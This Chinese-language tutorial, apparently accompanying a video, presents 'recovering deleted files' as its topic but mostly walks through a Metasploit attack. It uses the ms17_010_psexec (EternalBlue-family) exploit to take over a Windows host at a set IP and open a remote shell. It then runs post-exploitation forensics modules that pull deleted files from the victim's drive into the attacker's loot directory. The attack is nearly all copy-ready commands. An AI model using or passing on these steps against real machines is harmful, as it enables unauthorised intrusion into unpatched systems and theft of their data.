黑客是如何恢复任意删除的文件？回收站清空的也可以！

相关阅读

数据恢复

取证相关

Kali linux

Metasploit

Kali linux本身就自带，如果你觉得还不满足可以尝试Pro

视频讲解

你是否会遇到不小心删除了文件，同时清空了回收站？本期视频带你一起看看，黑客在入侵后是如何对删除文件进行恢复、并完成取证的，如何通过metasploit框架恢复电脑磁盘里删除过的文件！

图文讲解

接管目标计算机

启动Metasploit渗透测试框架

sudo msfconsole

搜索eternal模块

search eternal

使用编号1的模块exploit/windows/smb/ms17_010_psexec

use 1

然后设置目标服务器的IP地址

set RHOSTS 192.168.0.186

然后运行

exploit

这里显示已经接管了目标机器

您可以输入下面的命令接管windows电脑的cmd终端

shell

输入下面的命令可以退出进行我们的后续操作

exit

我们继续输入下面的命令，让会话在后台运行

background

数据恢复与取证

接下来是我们每个人最关注的，如何恢复我们删除的文件？

我们将使用post/windows/gather/forensics/enum_drives模块

use post/windows/gather/forensics/enum_drives

然后我们刚才在后台运行的会话是SESSION 1，因此我们需要设置该模块针对的会话是SESSION 1

set SESSION 1

然后运行

run

这里我们可以看到驱动盘

我们这里可以直接下一步，开始恢复E盘的数据，使用post/windows/gather/forensics/recovery_files模块

use post/windows/gather/forensics/recovery_files

然后设置磁盘为E盘，因为我们一开始是在E盘删除的文件

set DRIVE E:

然后设置会话为SESSION 1

set SESSION 1

然后运行该模块

run

我们发现这里已经找到了两个被回收站删掉的文件

我们这里尝试进行恢复

set FILES 356909056,356910080

上面设置的文件要填写刚才我们找到的文件ID编号

然后运行

run

我们可以看到文件已经恢复到了/root/.msf4/loot目录下

我们进入对应的路径

cd /root/.msf4/loot

使用cat命令查看其中的文件，发现和删除的简直一模一样，到这里恢复数据、进行取证就结束了！

希望今天的教程你能学到很多😊